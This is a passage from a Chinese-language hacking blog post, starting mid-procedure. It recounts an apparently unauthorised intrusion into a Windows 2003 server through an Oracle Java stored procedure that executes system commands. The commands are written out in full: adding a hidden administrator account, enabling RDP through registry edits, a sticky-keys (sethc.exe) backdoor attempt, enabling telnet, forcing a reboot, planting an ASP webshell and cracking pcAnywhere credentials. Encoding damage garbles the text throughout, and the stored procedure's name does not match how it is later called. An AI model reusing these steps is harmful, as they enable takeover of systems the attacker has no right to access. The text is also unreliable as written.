第二步：
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';
　　第三步：

create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;
　　創(chuàng)建完之后，就可以通過x := RUN_CMz(dos命令)來(lái)執(zhí)行系統(tǒng)命令了。
　　建 完存儲(chǔ)過程后系統(tǒng)命令執(zhí)行成功， 如圖

　　但是后來(lái)發(fā)現(xiàn)這個(gè)shell很不爽，如果遇到需要交互的命令就會(huì)卡死，剛開始想用"ftp 我的ip地址"檢測(cè)下能不能執(zhí)行，結(jié)果卡死，我這邊防火墻也沒反應(yīng)，不解，后tasklist，發(fā)現(xiàn)ftp://ftp.exe/，確定對(duì)方不能連接外網(wǎng)，可能有防火墻或作了設(shè)置，于是用ftp傳馬思路拋棄，打個(gè)systeninfo命令看下系統(tǒng)，是2003，于是打算先建個(gè)超級(jí)用戶然后開3389，執(zhí)行exec :x := RUN_CMD('net user')結(jié)果卡死，猜測(cè)net被刪，執(zhí)行
exec :x := RUN_CMD('net1 user');
　　成功，執(zhí)行
exec :x := RUN_CMD('net1 user rebeyond rebeyond /add&net1 localgroup administrators rebeyond /add');
　　成功，下面用reg命令讀下3389的狀態(tài)和端口，執(zhí)行
exec :x := RUN_CMD('reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"');
　　發(fā)現(xiàn)fDenyTSconnections值為1，說明3389關(guān)閉，于是依次執(zhí)行以下語(yǔ)句開3389：
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
　　因?yàn)閏md一交互就卡死，所以加了個(gè)/f強(qiáng)行參數(shù)，搞定后運(yùn)行mstsc連接，結(jié)果另人吐血，能連上但是卻沒有登錄窗口，提示說什么" awgina.dll被替換成未知版本",猜測(cè)可能把3389用到的dll給刪除了，因?yàn)殡m然不能登錄但可以連接，于是想到了替換sethc.exe，在shell下依次執(zhí)行：
exec :x :=RUN_CMD ('del c:\windows\system32\sethc.exe /f')
exec :x :=RUN_CMD('del C:\WINDOWS\system32\dllcache\sethc.exe /f')
exec :x :=RUN_CMD('copy c:\windows\explorer.exe c:\windows\system32\sethc.exe')，
　　按五次shift后發(fā)現(xiàn)沒替換成功，也沒刪除成功，推斷原因只有一個(gè)，就是沒權(quán)限，但是我在前面用java建shell前專門賦予了權(quán)限的，不解，百度一番!發(fā)現(xiàn)賦予文件操作權(quán)限必須得以dba的方式登錄，但是前面說了我們無(wú)法以dba方式登錄，頓時(shí)大腦一片空白，沒有寫和刪除權(quán)限，只有運(yùn)行權(quán)限，思路一下少了很多，繼續(xù)!!忽然想到了telnet，用reg查看了下telnet服務(wù)的狀態(tài)為禁用，于是執(zhí)行
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr" /v Start /t REG_DWORD /d 2 /f
　　把telnet服務(wù)設(shè)置為自動(dòng)，然后就是想辦法讓服務(wù)器重啟開telnet。
　 柳暗花明：
　　shell里執(zhí)行
rundll32.exe user.exe,restartwindows
　　,不一會(huì)主機(jī)重啟了，成功telnet，這樣權(quán)限我們已經(jīng)拿到了!但是要向圖像界面進(jìn)軍，在telnet執(zhí)行netstat -an看了下端口，發(fā)現(xiàn)5632，熟悉提權(quán)的人應(yīng)該很熟悉，這是pcanywhere的默認(rèn)端口，但是怎么才能知道pcanywhere的密碼呢?因?yàn)椴荒苓B接外網(wǎng)，所以直接傳cif文件是不可能的，于是想到了webshell!在telnet里找到站的 目錄d:\site,執(zhí)行
echo "" >d:\site\guestboook.asp
　　訪問成功，然后用海洋一句話提交大馬成功如圖：
　　

　　跳轉(zhuǎn)到pcanywhere的cif文件目錄下載cif文件并破解，成功得到pcanywhere的密碼，如圖：
　　

　　到這基本就結(jié)束了，但是pcanywhere遠(yuǎn)程很不爽，于是還是想開用3389，于是百度搜索原因，發(fā)現(xiàn)是3389和pcanywhere沖突的原因并找到了解決辦法，刪除某個(gè)注冊(cè)表項(xiàng)就搞定了，在pcanywhere操作就很簡(jiǎn)單了，搞定后重啟服務(wù)器，連接對(duì)方3389，終于看到了熟悉的登錄界面，用前面建的用戶成功登入!如圖：
　　

　　至此整個(gè)入侵過程宣告結(jié)束!

最新評(píng)論